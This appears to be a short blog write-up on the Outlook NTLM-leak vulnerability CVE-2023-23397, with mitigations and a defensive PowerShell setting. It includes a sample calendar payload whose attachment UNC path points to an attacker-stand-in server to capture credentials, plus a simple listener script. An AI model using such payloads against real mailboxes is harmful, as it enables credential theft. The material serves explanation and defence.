← Writing
CVE

CVE-2023-23397

Sep 8, 2024 · 3 min read

How CVE-2023–23397 Works

The vulnerability exploits how Microsoft Outlook handles reminders and calendar invites. Normally, Outlook processes these items to display notifications and updates. However, in this case, attackers can create a specially crafted message that tricks Outlook into making an outbound connection to a server under the attacker’s control. This connection is made using NTLM authentication, sending the victim’s NTLM credentials and exposing them to potential misuse.

Exploit Scenario

  1. An attacker crafts a malicious email containing a reminder or calendar invite.
  2. The email specifies a UNC (Universal Naming Convention) path that points to an attacker-controlled server.
  3. When Outlook receives and processes this email, it automatically tries to access the specified UNC path, triggering NTLM authentication and sending the victim’s credentials to the attacker.

Code and Example

import http.server
import socketserver

class MyRequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"Received connection from: {self.client_address}")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"Hello, you've been logged!")

PORT = 8000
handler = MyRequestHandler
with socketserver.TCPServer(("", PORT), handler) as httpd:
    print(f"Serving on port {PORT}")
    httpd.serve_forever()

Malicious Email Payload Example

BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:123456
SUMMARY:Malicious Reminder
DTSTART;TZID=Europe/London:20231105T090000
ATTACH;VALUE=URI:\\attacker-controlled-server.com\malicious\path
END:VEVENT
END:VCALENDAR

Impact and Risks

Mitigation Strategies

  1. Update Microsoft Outlook: Microsoft has released patches for this vulnerability. Ensure that all systems are updated to the latest version of Outlook.
  2. Disable SMB Outbound Traffic: Blocking outbound SMB traffic at the network perimeter can prevent credentials from being sent to an external server.
  3. Use Protected Users Group: Members of this group in Active Directory are protected against NTLM authentication.
  4. Implement NTLM Blocking Policies: Where possible, configure policies to restrict NTLM authentication and enforce Kerberos.

Defensive Example in PowerShell

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value "2"

This command enforces NTLM restrictions, significantly reducing the risk of credential theft.

← All writing